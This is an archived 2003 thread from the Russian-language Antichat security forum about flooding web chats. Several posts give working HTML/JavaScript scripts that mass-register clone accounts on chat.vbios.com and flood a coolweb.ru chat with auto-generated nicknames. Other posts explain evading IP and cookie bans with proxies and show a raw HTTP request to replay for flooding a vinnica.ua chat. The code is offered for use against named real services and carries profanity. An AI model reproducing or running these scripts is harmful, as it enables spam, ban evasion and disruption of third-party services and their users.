ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.10.2003, 04:08
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

urlin! </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"> я например хотел флудить через ник чат на www.coolweb.ru так ничо не вышло!![/QUOTE]<span id='postcolor'> Это потому что ник сначала регить нуна. Так не пойдет. Долго смеялся с формы для регистрации, спасибо что хоть размер трусов и номер танка не спрашивают И насчет формочки годичной давности, кажется еще работает (хотя недолго после этой публикации ей осталось наверна). Вот, кстати как регистрировацца нуна: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<meta http-equiv=content-type content='text/html; charset=windows-1251'>
<style>
td{font-family:verdna,arial;font-size:12px}
a{font-family:verdna,arial;text-decoration:none;color:333333}
a:hover{color:f49a21}
input{border-bottom: #F2F4F7 1px solid; border-left: #000000 1px solid; border-top: #000000 1px solid; border-right: #F2F4F7 1px solid;width:130;background-color:88B6D1}
select{width:130;background-color:88B6D1}
.comment{font-family:verdna,arial;font-size:12px;color:ff0000}
</style>
&lt; script>
var ss;
var s2;
var i=1;
var maxi=15;
var ps="fuckbitch"

function flud()
{
s2=ss+i
document.forms[0].login.value=s2;
document.forms[0].nick.value=s2;
document.forms[0].pass.value=ps;
document.forms[0].passconf.value=ps;
document.forms[0].target="http://chat.vbios.com/index.php";
document.forms[0].submit();
i++;
if (i<maxi)
window.setTimeout("flud();",850);
else
i=1;
}

function sendf()
{
ss=document.forms[0].login.value;
flud();
}

function sbm(){document.frm.submit()}
</script>

<center>
<p>
&amp;#9824заполниь поле login и нажать кнопку. выполнено var maxi повторов затем заход по последнему значению ника. пароль одинаковый: fuckbitch для всех клонов ставится автоматом.&amp;#9827
<p>
<form method=post action=http://chat.vbios.com/index.php?pgn=registration name=frm target=_top>
<input type=hidden name=action value=1>
<input type=hidden name=page_name value='registration'><br>
<table cellspacing=0 cellpadding=2 border=0 width=200 bgcolor=f49a21><tr><td>
<table cellspacing=0 cellpadding=2 border=0 width=100% bgcolor=ffffff><tr><td>
<table cellspacing=0 cellpadding=0 border=0 width=100% bgcolor=e2e4e6>
<tr><td height=18 bgcolor=88B6D1 colspan=2>&amp;nbsp;<b>регистрация</td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td width=100%>&amp;nbsp;логин</td><td><input type=text name=login value="matherfucker">&amp;nbsp;</td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td width=100%>&amp;nbsp;ник</td><td><input type=text name=nick value="matherfucker">&amp;nbsp;</td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td>&amp;nbsp;пароль</td><td><input type=password name=pass value="fuckbitch">&amp;nbsp;</td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td nowrap>&amp;nbsp;еще раз</td><td><input type=password name=passconf value="fuckbitch">&amp;nbsp;</td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td height=2 bgcolor=88B6D1 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td colspan=2 align=center>&amp;nbsp;<b><a href=javascript:sendf()><font color=000000>зарегистрироваться и войти</font></a></b></td></tr>
<tr><td height=2 bgcolor=88B6D1 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td>&amp;nbsp;комната</td><td><select name=id_room><option value=1 selected>Тусовка<option value=2>Кусты<option value=3>Third</select></td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td>&amp;nbsp;пол</td><td><select name=id_sex><option value=1 selected>Мужской<option value=2>Женский<option value=3>Средний</select></td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td>&amp;nbsp;цвет</td><td><select name=id_color><option value=1 selected style='color:FF3333'>красный<option value=2 style='color:000000'>черный<option value=3 style='color:003399'>темно-синий<option value=4 style='color:1155BB'>синий<option value=5 style='color:0066FF'>голубой<option value=6 style='color:336600'>зеленый<option value=7 style='color:CC6600'>коричневый<option value=8 style='color:FF3399'>розовый<option value=9 style='color:889955'>болотный<option value=10 style='color:606060'>серый<option value=11 style='color:990099'>фиолетовый</select></td></tr>
<tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
<tr><td>&amp;nbsp;шкурка</td><td><select name=id_skin><option>по умолчанию</select></td></tr><tr><td height=2 colspan=2><table cellspacing=0 cellpadding=0 border=0><tr><td></td></tr></table></td></tr>
</table></td></tr></table></td></tr></table>
</form>
</center>
[/QUOTE]<span id='postcolor'>
Выбирай ник покороче. Настраивай время задержки если не пашет. И жми &quot;регистрировацца и зайти&quot;. С тех славных пор этот чат сильно изменился но я там уже не вишу и мне лень разбирацца. Все же небольшая просьба: не гнуть пальцы и не бить себя резко в грудь перед админом (forever) и програмером (root) а также другими товарисчами из ихней шайки (они типа контерстрайковцы, вот к примеру инфа: http://forum.vbios.org/showpro....ge=http там в ихней шайке многа народу к примеру еще IZZY тусуецца на том чате, MIA - жена форевера). Остальные модераторы набираюцца из активных участников чата и ихние познания по компутерам и инету очень скромные. Что интересно, почти нахаляву люди работают Ну у них там клуб есть на Красноармейской (возле палаца &quot;Украина&quot - так они типа там могут бесплатно шарицца вот и все привилегии Почему не нуна выпендрывацца? - как видишь формочка для флуда до сих пор канает, а что будет если все начнут из себя умников изображать? Вы оказываете услугу администраторам, указывая им на глюки и недоработки, а там такие админы что они того не стоят. Если же невтерпеж, пожалуйста убедись что нет модераторов, загнув пару матов в чате или на крайняк хотябы администрации (см. выше). И еще там пару весчей канает, вот = к примеру. Но флудить в самом чате нам всеравно никто не запретит, спасибо Алголу за инеткрак Прикольная ссылка: http://forum.vbios.org/showpro....ge=http = я плакаль:-)))
 

  #12  
Старый 10.10.2003, 18:32
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

 

  #13  
Старый 11.10.2003, 10:17
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

URLIN:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
Чат о &quot;&quot;
Внимание! Если у тебя нет ника и пароля на COOLWEB.RU, тебе надо сначала
зарегистрироваться!!![/QUOTE]<span id='postcolor'>
Это значит что даже если от тебя и не требуется вводить пароль каждый раз, то ты должен быть хотябы раз зарегистрирован и прилежно обязуешься хранить у себя на тачке кукизы этого сайта (причем сразу в двух местах: кэш инета и одноименная папка в каталоге выньдовз). Что характерно, пароль по сети не передается и в кукизе не хранится. Вместо этого передается некий ИД: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">Cookie: COOLWEB%5FTEST%5FCOOKIE=OK; uid=93364[/QUOTE]<span id='postcolor'> (вместе с собственно номером самого куки. А теперь прикол: ник передается во втором пакете: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">doaction=1&amp;chat_id=4327&amp;nick=ggg ggggggg&amp;submit%22=%C2%EE%E9%F2%E8+%E2+%F7%E0%F 2%21[/QUOTE]<span id='postcolor'> Таким образом, учитывая еще один номер &quot;chat_id&quot; оказывается возможным (не без попустительства соотв. скрипта на сервере ессесно) открывать несколько сеансов чата с разными никами. В процессе автоматизации задачи флуда выяснилось что сервак всеже просекает с одного куки несколько раз в секунду пытаются зайти (я получил бан сразуже даже не заходя в чат). Но выбрав задержку в полторы секунды все прекрасно работает. Насколько я в спешке успел заметить то сначала тебя пытаются банить по айпи: т.е. сменив проксю можеж и дальше заниматься своим нехарошим делом:-) Но потом тебя уже банят на уровне кукизов, и возможно даже с удалением из базы?:-\ Если тебя не смущают затраты времени на смену проксяка, удаление кукизов и повторную регистрацию тогда лови код: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD>
< script language=javascript>
var nick="";
var i=0;
var max=0;
function flud(){
document.forms[0].nick.value=i+nick+i;
document.forms[0].target="http://www.coolweb.ru/chats/chat_enter.asp";
document.forms[0].submit();
i++;
if (i<=max) window.setTimeout("flud();",1500);
}
function init(){
nick=document.forms[0].nick.value;
max=imax.value;
window.setTimeout("flud();",1500);
}
</script>
<BODY>
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD vAlign=top align=middle height=35>
<DIV class=reklama>Чат о "Болтаем, знакомимся"</DIV></TD></TR>
<TR>
<TD><IMG height=8 alt="" src="http://www.coolweb.ru/images/rectup.gif"
width=16 border=0></TD></TR>
<TR>
<TD align=middle bgColor=#ffcc00>
<FORM method=post name=form1 action=http://www.coolweb.ru/chats/chat_enter.asp>
<INPUT type=hidden value=1 name=doaction><INPUT type=hidden value=4327 name=chat_id>
<TABLE cellPadding=3 border=0>
<TBODY>
<TR>
<TD colSpan=2><IMG height=4 src="http://www.coolweb.ru/images/pxopac.gif" width=1></TD></TR>
<TR>
<TD class=chanelfix>Ник для чата:</TD>
<TD><INPUT name=nick></TD>
<TD></TD></TR>
<TR>
<TD></TD>
<TD><INPUT type=submit value="Войти в чат!" name=submit"></TD>
<TD></TD></TR>
<TR>
<TD colSpan=2><IMG height=4
src="http://www.coolweb.ru/images/pxopac.gif" width=1></TD></TR>
</TBODY></TABLE></FORM></TD></TR></TBODY></TABLE>
<P>&amp;nbsp;</P><font face="courier" color="red">
Сколько? : <input type=text size="10" name="imax" value="10">
<input type=button value="флуд" onclick="init();"></font></BODY></HTML>
[/QUOTE]<span id='postcolor'>
 

  #14  
Старый 11.10.2003, 12:35
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

ну ту руль чел=-)!а вот енто как зафлудить:http://www.vinnica.ua/perl/schatli.c...&amp;act=index
код нижнего фрейма не выкладываю а то меня алгол опять обвинит в засаривании форума...
 

  #15  
Старый 11.10.2003, 12:44
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

мож я конкретный осел но при нажатии войти в чат ничо не происходит...а при нажатии флуд и подавно...=-(
 

  #16  
Старый 11.10.2003, 22:24
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ октября 11 2003,12:44)</td></tr><tr><td id="QUOTE">мож я конкретный осел но при нажатии войти в чат ничо не происходит...а при нажатии флуд и подавно...=-([/QUOTE]<span id='postcolor'>
Обращаю внимание на то, что форум вставляет пробел в тег &lt; script&gt;. Если вы копируете HTML текст из форума, то необходимо удалить пробел между &quot;&lt;&quot; и &quot;script&quot;
 

  #17  
Старый 12.10.2003, 11:25
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

я не заметил!спасиб человече!а все таки слухай как взломать чат http://www.vinnica.ua/perl/schatli.cgi?id=vin&amp;act=index
форма входа на винт так и не пошла отсылая сообщения работал с винта но ниче не вышло....даж когда свои теги подписывал...не подскажешь как правильно сохранить форум входа?все неполные пути на полные сменил вместо всех hidden name &nbsp; &nbsp; text name &nbsp; поставил...так в чем дело?не объяснишь?
 

  #18  
Старый 12.10.2003, 20:23
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

кстати сорри за оффтопик...=-)
 

  #19  
Старый 13.10.2003, 00:34
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ октября 11 2003,12:35)</td></tr><tr><td id="QUOTE">ну ту руль чел=-)!а вот енто как зафлудить:http://www.vinnica.ua/perl/schatli.c...&amp;act=index
код нижнего фрейма не выкладываю а то меня алгол опять обвинит в засаривании форума...[/QUOTE]<span id='postcolor'>
1. Пользуйся тегами &quot;code&quot; для вставки кода (кнопочка есть или сам в квадратные скобки).
2. Текст приводить не нужно, достаточно ссылки на ресурс
3. Зафлудить этот чат через html-форму не получится так как от проверяет read-only свойство referrer (т.е. изменить это свойство документа с помощью скрипта нельзя).
4. Зафлудить чат все же можно на уровне http-протокола (на уровне http-пакетов). Для этого тебе требуется снифер http-пакетов (например прога Naviscope) и програмка для их изменения. Последнюю ты можешь написать сам (это не трудно, берешь дельфю и на порт 80 сервака посылаешь измененный пакет (в текстовом виде)) либо воспользовацца &quot;InetCrack&quot; (кстати всеобемлющее такое название :-), любезно предоставленной г-ном Algol-ом. В комплект поставки последней также входит вышеупомянутый &quot;Naviscope&quot;.
5. Как зафлудить чат на уровне http, выходит за рамки этой темы но тем не менее разок проясню этот вопрос. Вот такой пакет отсылается серваку при входе в чат:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">POST http://www.vinnica.ua/perl/schatli.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, application/x-gsarcade-launch, */*
Referer: http://www.vinnica.ua/perl/schatli.cgi?id=vin&amp;act=nameprompt
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Host: www.vinnica.ua
Content-Length: 56
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SchatLI=FFFFFF%3Adddddd

nik=dddddd&amp;color=FFFFFF&amp;Enter=Enter&amp;id =vin&amp;act=userenter[/QUOTE]<span id='postcolor'>
Здесь dddddd - твой ник. Обрати внимание на Referer. И на поле Cookie: в твоем случае это поле имеет другое значение. Дальше, думаю разберешься уже и сам...
 

  #20  
Старый 13.10.2003, 00:36
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ октября 11 2003,22:24)</td></tr><tr><td id="QUOTE">Обращаю внимание на то, что форум вставляет пробел в тег &lt; script&gt;. Если вы копируете HTML текст из форума, то необходимо удалить пробел между &quot;&lt;&quot; и &quot;script&quot;[/QUOTE]<span id='postcolor'>
насчет пробелов в &lt; script&gt;. Я не понимаю зачем возитьтся с перекодировками каждого &quot;опасного&quot; символа. Вместо этого при разбореке тега [code] на мой взгляд проще будет воспользоваться тегом &lt;PRE&gt; либо устаревшими (но работающими) &lt;XMP&gt;, &lt;LISTING&gt;, либо &lt;PLAINTEXT&gt;.
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ